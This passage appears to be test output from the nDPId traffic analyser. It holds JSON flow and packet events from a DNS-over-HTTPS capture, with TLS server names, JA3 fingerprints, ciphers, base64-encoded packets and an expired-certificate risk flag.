00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400294,"flow_last_seen":946739400340,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739400340,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":946739400340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAApAAJAADgGtq+S\/zhiCgAAAQG7qsavYnvOXaanwFAYBBNMgAAA9gAAAAAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946739400581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":946739400581,"pkt":"REREREREZmZmZmZmCABFAAFHpuhAAH4GfboKAAABwUZVC9OUAbunNzlTos+VOVAYAfbYRwAAFgMBARoBAAEWAwO9Yq6mzn6Kf+YkY+w4Q\/vo+7yhlWhjohroCY4Mal823CCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACnAAAAFgAUAAARZG9oLmJvcnR6bWV5ZXIuZnIABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6wutcF723xZ1OaF0ooDfgy7xahyBeOD2x7PNk\/t6gG4="}
00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":946739400612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAuA435AADQGgOvBRlULCgAAAQG705Siz5U5pzc6clAYAfXigAAAFgMDAHoCAAB2AwPum08l8a\/xsIE7sf4ouj1cFjIcJvTzL6IcltC8x2MVWyCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XxMCAAAuACsAAgMEADMAJAAdACDFCe5GcFoAINJ8W\/U00yxwlYg7Wtx0yaBhsZxlJVHAahQDAwABARcDAwAgjb6\/bt9RU3n7f\/XK70kHoogWe0pWzujxYyDQFCzDS9sXAwMKFyLHVFWncnvuWpj00oLMIDtr5tAZiqfcqzwOOMNYqfKKQHH219coqZSx1dHk2hi5d1LB3GytI8vYkc59i5RQQDbXAHUuezlbBvO8F+B3yrBrypISyNX1A4sx1E9x9g092nWO74tZVT++3VZ86RoDvvF0ZUqxTSHr+1nR9kKZh0N5lUkvTu0aK5ORhVWNfmq0hwnrW5s27rBfHFIN8y0h27yxFq4SIl7wwuk6Mq7vkrvqIsM5xqyCc\/9Xu0OqSF3zUNnkItIrGQeIJp3LGwwIhQxxQAsnuWmwcXNFRqEzMD5jbEtpKYkHahCBuU\/B3PKrCTX8+YsVVjGS5Qrjne3Kr5FWp6nlPfIH59LkIEasv75h75FcjD+7wr54z1JIPpP7ZrLR5PywuD6f88xvloKZN+WwiXGAie649c7JKsyGwCn507cb9CeSrJLhgRoQlUSUEBlnxiSHhJ2mw9owqvmzHqRqTxGrXh9qTPYDQpk5QRLmSGX3D7g6VS6CrNB+GfCK6SPMgzdR+k8lAJJdHOY0ZZdv+Ya6nA3r8RDkXrspyuJsV4QMPLAoNzQvGen9CeK5JxcSLtBMp5q0B1DBO5EIcsoLQQ6lCwlPm8U6NZmJK6eA9zbgzP80r8LRBBpZx1beD6mw3j+TpFAy+igQ8+ETtD4YPbZPWCgC6xVG0u33AvPq8sRsHwGqnzJp1MW\/CDUHInzc9xT9j80aqrzF0XcmMIsrs4KNMQ8QDQCsJmct9U0iMbkLXGLFA32BoRsU95KY+6gDs57twsE3JaqfYSuTq\/Dlicgoiy07U8DZsIf1tKivKbhBZS1qr1PaAU2W3RuJy+8koP4fg1irOvcozqBrDOixlNBNoG8ob7RGwcT3Z0ArR3tWTeHxhQydU29KSYU8HwZniOUgn1K8cz071\/P8S72m5u89j2RZsoG54t+A\/1vLyZMsjOXjwepn9YLOohxBXEIx84KuxUh3bAga+k\/yE8GW5vng0KtP1aBiU4Tc6A+REN2DA3ij6lHoD2sFhJA2fLcssM6OpAK\/moM166igfSm3LqGC4gK+TDj4gtClJchy8bvN8tctQ8iFjFj\/6qv7lxplsZ49PvHPbnKju\/tev2fd5dDj7QcMjqNvhblPBUZ32SOOjxBH3RE7aBpBLMz7W1\/NpSWcgM15pyZsPx8isO02KbyH6gAHIs+ZEGj61i6mnrDsMNesZUMUM55VeDXhdpD8kmxGJpLZ3bsJ69dZmjx3Rf6Zgw2KbXhlm6KMoEBrRSd15+xgTimUz9H5N6PvNLfaRiGX8r4RI6AIPrxRNjrz1JtdmeN1NzdaLUaHCvnql7jjxoX9Sn8xtUQxnkcUzYoweeIrvi9ulLP7ucnd54pGXhyPpURQBCM2nU9nbu+b6Pbj4vx7uFCRh\/lkqhRWVdTtE5uZmH8x4uxAXTdo\/R5oSgAkEsgUzYbuz4+G0Ch0T6jruu4T9ekEthrBCQJjN3fHGBcpM7AMfx+FKZas1DTjRC6L41JS2ixQWYjQbws0Hx+sBQGG6PAX0ilnkOFTCqdi4OZ+YhHBZ3aa4TDran\/FLmLs4pdGLb\/oqLyzwsvNQ7jdGUh2A89lsoDzqOObMQCUrWrG7EbmBEy\/sbHnGgiIy31PynXQexT3lSGWXsVy54UK1SdBZ18JpRAq1XaEcJZV9BqOYiMFEVnHR9zwIUFWwIjG0UpAOSNn7blveeCwW\/YovVsVKboGuW3yyReDZYyNgSvRfgvPpiG+pklW5Ihw+wYJ1sPXS0I2yAnATL00hg3Bnv3J6\/Z\/+4vJOHMRe5zCkPZYK8w\/AOnTp5VZVUALMm2aJruUFq4CXZyWMk1kbL3XBzpFB\/roJe8IiU+Kt9kQ449THNAxRUoavQeSeXnuQSkwDYmI0buLWeiaEzMUY5OavuLtDgD4c+avQlGrce7Ozez1RlLgPgV+i3DcrjoWos6tTeu8g4pr3NuCp14nKYaub7Vt2s0JPBPZqY\/MuyLA\/e3Fr\/OMlh\/EauRFDsRaqiHBJ2mP3NA8\/ZyaQQcWAIVjHSjsVGu2nQBYWjKsZ8mKcS9VpMr9ndCkWOs5Sz5zWAutH8paKKKAqBcvloCRHOWIfcJ9h9uc3Lq9DYb+le+8B4yxwh7qQJOXNZwdUQbb19fMRPNRiaEzON5GpXpNywN75iIVBnfCJp5hZfV7tIfK22ta\/Z6stqDCIyk+p27DCeEPYmTJDSSHKNbedRdn0\/iB9LUsBrCmi7IRRBlE2Tr8s2JDIPOoL9S4j6C6g1r3fpCuw4mXBrcGCfNjDw6rPYEplJqhIiTO+juQuxn5Prjqj21RvbfTbyzJIvTV7a0Zy5SJ1YWQ9z3NLs75HRnYaEIc3G103AKPkytzCjXINk0eKUkCZXrW9QupQw5YZCi9c+zr9e6Nsrg4KBkr13ePLbPEqhzK0TgphOe\/BgDw39ES3e0uIMvXuKrcPIZlkW8iZdSPWqT0Pls1rgFcXIxjJuZzAKdz9RIDjZGrpzpHXAzwarf0m0i2Gtw3bYKFHdkTT5n1uaYQthMuQHJHi+p8XDFtekQax3jKJD3CiZg+YeLzJ5Uo0iEidZKe5rH7ZzgkT8O0rVZwq5niGJgbiV3EUpPldHNKypyvkj3ycT9kY2IJU7ZpXJRnpDRxjhVDO4G\/kK6jqgKdwB9YrN8ddL2ErNeFlxtrqM8tHt2ZYdSMZYCnp2omvPy97RCe3Cp\/HGnLxpRs+DW569z8h8BSfI\/zMEZeQ4RsdRgF8hz+rQ8SRDGvtaqUblOPSNlurg9vSpcyYw7DcuCxkCASBOvLXbWh8As7fT8An8+JscVf\/lq\/mGQvDlSuFNj+tDMXoI0ZKapFzG\/KPdLhwKgFCipECC9Er6NeMVnAw07Z3oto50ydjbh57kzukh0zqDBLZjEhtFpoAiVBqZg7B50ytdFgK+6hZgsHjVoNuFRf32MJngr13fBBtHKo\/VHaVg4drs9W9DfAL1w5rtOMVsX6aUt1YAeiwdGBNEPyNmvNCcEQOj+xzMfVoOLm7SUXFyIm1n+reDHyXo8yNG7LkDYjmq\/JLkrpjl4bFeLBsdG760CBaEUCZJd3nvhfPPBsfCBF5PswuYpAEifKeZ17NlOaSrxj79WssKYt4uUKm2gm9JHcvNneM5n7DQEooPTVEVYNOgvXrRVlbfz+Cy2kBP2gCp+jUrcKx4YKGEhDuMaL8PfHGRT2vA7nqzUU9C3cJ3emOjaD7KMjipJvPBaA7U+L8ujhu2gJWLx4yY7mn3RV6K2HsrFjTJduvDGB+DqQg96t2CJjvMbpqIitN9hBxZbznMh3XU1HogwVfIbOe8Ug8cikY7ag9rW6E1CfeBwa9CM8u9CTXlTgumW220WzI\/+S8CMvOup0C9PugMt2Jc4cXDvNs+dyRWH3X7QIImonFrQ6RaFIHlbDa5gqN+0VC87hnjQE8OUpxOAg1ReSXhcDAwEZLWp\/o3fXWPvp18ZXCuvlFC4i5H\/0jL\/Tq956IZziJu\/XhSjlSr056BPu7zKCegDZWzYsK6oLPWAfcvtcSfAPACHpLE+JYCNMevr7LjdkYBxYeJsjktZDgoEi7lSxc1XaPOcOHuKcNBIZPhHzY\/jpu14RecKRjxP8M4PlZTTXUvzf286xa1A7FPGcV7e6"}
00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400581,"flow_last_seen":946739400612,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3191,"flow_avg_l4_payload_len":1595,"midstream":1,"thread_ts_msec":946739400612,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":946739400612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAD+44BAADQGi2vBRlULCgAAAQG705Siz6CRpzc6clAYAfVAMQAA7MoGonW0Fj4lHArVaOCgJtbHn9aRY0n9LKnu3cTyqbChLhfccHsdC81z2fZ+Ukv\/nAuBoKACJX8Pwem5JBIGeQ+hR9gvbJqO0dljTEjfnQJGlcWyJk4FqoFjayNoVLdbRg\/yWeK8VeLtflQjLxqwMpDM\/QbduG5HAuBrFrE4C7dTGq1PezTGhU9pqGsXAwMARb1ScBcpf\/m81VPRA3LW\/2mv0IZmicbA7T0x5byJ5bKDeMQneniKc1y1kH9Jz7ueZz9IjjqOqk3CW8r0ZREMc3BCfYPYBQ=="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946739400702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739400702,"pkt":"REREREREZmZmZmZmCABFAAFILINAAH4GS1wKAAAB0frxGYuCAbtSRrNTwAekRVAYAfaFCwAAFgMBARsBAAEXAwMzpeRPPpmPOBWwlYuEr5uNgoasUYbxY5rOmYFKCjGtJyAIAEydch7b9cupGuDzo92xh9NLKrnQMxUlfE7nWZM5\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJeuQLdGEJN7n7Os\/LoZLYTlp1p11dddxIYAQZdOassB"}
00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
03224{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946739400727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAgouN1AADcG\/yHR+vEZCgAAAQG7i4LAB6RFUka0c1AYAfWL6wAAFgMDAGYCAABiAwNagb8+u4y1yd1xwzS1nH\/nTUIdC4eY2A55MtUayrM8fyDO5yrWZS4Aa1iS7gSLPLT\/C8LAuC029TJv1sr4CTESSMAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="}
00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":946739400727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAXxuN9AADcGAVfR+vEZCgAAAQG7i4LAB6xFUka0c1AYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIBuLZjnTB3Kjce7+mNxfaBiRgPo4iNkyTjzm6+fh98MBCAQBAAD35z4OurpaleuYyQXrRwgunZx5itw99f\/qns7fqVRPpCakkPBqYtIkrAQds7t3x9gcyB3pN\/ek7QU4lXsRRnsrWpFsVpkkgouj8noQcYPmvp55cuzOEjLxYK5KOB1bU10ZmdANW3hMqgjTathZk6jfjNOD8MgF15uckgPUXOITOpG7UYd\/YtxRx7xgMGY0jlH\/+xeUF+NSAiy6s9oSi0oU\/QlatPOidPhVmRC84vWQNkgJhZubcKWseKLjiRRL9zUmMJ2fjig0R0EKUVh0pAUSNWsA0m3x1YIPV6kX\/fzGNkCBx4kijVkxENgEgAD9si+WguAjMtSH5qQYN0CMxwsWAwMABA4AAAA="}
01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 